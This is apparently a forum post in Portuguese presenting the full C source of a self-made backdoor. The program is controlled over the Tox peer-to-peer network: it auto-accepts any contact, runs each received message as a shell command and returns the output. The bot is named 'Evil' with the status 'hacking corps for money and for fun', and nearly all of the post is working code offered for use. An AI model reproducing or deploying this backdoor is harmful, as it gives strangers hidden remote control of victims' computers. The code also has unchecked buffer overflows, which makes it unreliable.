Olá, esta é minha primeira tentativa de criar um backdoor controlado por toxinas.
Sou programador, mas não tenho experiência em C então pode ser melhorado, nem sei programar nele, obviamente não é tão difícil se você souber programar em outras linguagens, na hora de compilar o código, ele nos fornece um tox id, que pode ser usado para enviar comandos de qualquer cliente tox, como qtox ou utox

#include <ctype.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "include/sodium.h"
#include "include/tox.h"

typedef struct DHT_node {
        const char *ip;
        uint16_t port;
        const char key_hex[TOX_PUBLIC_KEY_SIZE*2 + 1]; // 1 for null terminator
} DHT_node;

#define MAX_MESSAGE_LENGTH 1000

void send_command_output(Tox *tox, uint32_t friend_number, const uint8_t *command, size_t command_length) {
    FILE *fp;
    char output[MAX_MESSAGE_LENGTH];
    char path[MAX_MESSAGE_LENGTH] = {0};

    // convert data of uint8_t to char
    char command_str[MAX_MESSAGE_LENGTH];
    strncpy(command_str, (const char*)command, command_length);
    command_str[command_length] = '\0';

    // execute the command and get the output
    fp = _popen(command_str, "r");
    if (fp == NULL) {
        printf("error running the command.\n");
        return;
    }

    // read command output
    while (fgets(output, sizeof(output), fp) != NULL) {
        strcat(path, output);
    }

    // close file pointer
    _pclose(fp);

    // send command output to the tox friend
    tox_friend_send_message(tox, friend_number, TOX_MESSAGE_TYPE_NORMAL, (const uint8_t*)path, strlen(path), NULL);
}

/*   handle friend request */
void friend_request_cb(Tox *tox, const uint8_t *public_key, const uint8_t *message, size_t length, void *user_data)
{
    tox_friend_add_norequest(tox, public_key, NULL);
}

/*   handle friend message */
void friend_message_cb(Tox *tox, uint32_t friend_number, TOX_MESSAGE_TYPE type, const uint8_t *message, size_t length, void *user_data)
{
    send_command_output(tox, friend_number, message, length);
    //tox_friend_send_message(tox, friend_number, type, message, length, NULL);
}

/* show my connection status */
void self_connection_status_cb(Tox *tox, TOX_CONNECTION connection_status, void *user_data)
{
    switch (connection_status) {
        case TOX_CONNECTION_NONE:
            printf("Offline\n");
            break;
        case TOX_CONNECTION_TCP:
            printf("Online, using TCP\n");
            break;
        case TOX_CONNECTION_UDP:
            printf("Online, using UDP\n");
            break;
    }
}

int main() {
    /* create new tox instance and save the error on this if fail to create new tox client instance */
    TOX_ERR_NEW err_new;
    Tox *tox = tox_new(NULL, &err_new);

    /* check if the tox instance is created now */
    if (err_new != TOX_ERR_NEW_OK) {
       fprintf(stderr, "tox_new failed with error code %d error to create new tox instance\n", err_new);
       exit(1);
    }

    /* the name of the bot */
    const char *name = "Evil";

    /* set the name of the tox client*/
    tox_self_set_name(tox, name, strlen(name), NULL);

    /* set tox bot status message */
    const char *status_message = "hacking corps for money and for fun!";
    tox_self_set_status_message(tox, status_message, strlen(status_message), NULL);
    /* tox_self_set_status(tox, TOX_USER_STATUS_BUSY); */

    /* list of the tox nodes for the p2p network */
    DHT_node nodes[] =
    {
         {"85.143.221.42",                      33445, "DA4E4ED4B697F2E9B000EEFE3A34B554ACD3F45F5C96EAEA2516DD7FF9AF7B43"},
         {"2a04:ac00:1:9f00:5054:ff:fe01:becd", 33445, "DA4E4ED4B697F2E9B000EEFE3A34B554ACD3F45F5C96EAEA2516DD7FF9AF7B43"},
         {"78.46.73.141",                       33445, "02807CF4F8BB8FB390CC3794BDF1E8449E9A8392C5D3F2200019DA9F1E812E46"},
         {"2a01:4f8:120:4091::3",               33445, "02807CF4F8BB8FB390CC3794BDF1E8449E9A8392C5D3F2200019DA9F1E812E46"},
         {"tox.initramfs.io",                   33445, "3F0A45A268367C1BEA652F258C85F4A66DA76BCAA667A49E770BCC4917AB6A25"},
         {"tox2.abilinski.com",                 33445, "7A6098B590BDC73F9723FC59F82B3F9085A64D1B213AAF8E610FD351930D052D"},
         {"205.185.115.131",                       53, "3091C6BEB2A993F1C6300C16549FABA67098FF3D62C6D253828B531470B53D68"},
         {"tox.kurnevsky.net",                  33445, "82EF82BA33445A1F91A7DB27189ECFC0C013E06E3DA71F588ED692BED625EC23"}
    };

    for (size_t i = 0; i < sizeof(nodes)/sizeof(DHT_node); i ++) {
        unsigned char key_bin[TOX_PUBLIC_KEY_SIZE];
        sodium_hex2bin(key_bin, sizeof(key_bin), nodes[i].key_hex, sizeof(nodes[i].key_hex)-1, NULL, NULL, NULL);
        tox_bootstrap(tox, nodes[i].ip, nodes[i].port, key_bin, NULL);
    }

    uint8_t tox_id_bin[TOX_ADDRESS_SIZE];
    tox_self_get_address(tox, tox_id_bin);

    char tox_id_hex[TOX_ADDRESS_SIZE*2 + 1];
    sodium_bin2hex(tox_id_hex, sizeof(tox_id_hex), tox_id_bin, sizeof(tox_id_bin));

    for (size_t i = 0; i < sizeof(tox_id_hex)-1; i ++) {
        tox_id_hex[i] = toupper(tox_id_hex[i]);
    }

    /* print the tox id of the bot */
    printf("Tox ID: %s\n", tox_id_hex);

    /* set the requests callback for new friends */
    tox_callback_friend_request(tox, friend_request_cb);

    /* set the request callback for new messages */
    tox_callback_friend_message(tox, friend_message_cb);

    /* the main loop of the bot */
    while (1) {
        tox_iterate(tox, NULL);
        usleep(tox_iteration_interval(tox) * 1000);
    }
    tox_kill(tox);
    return 0;
}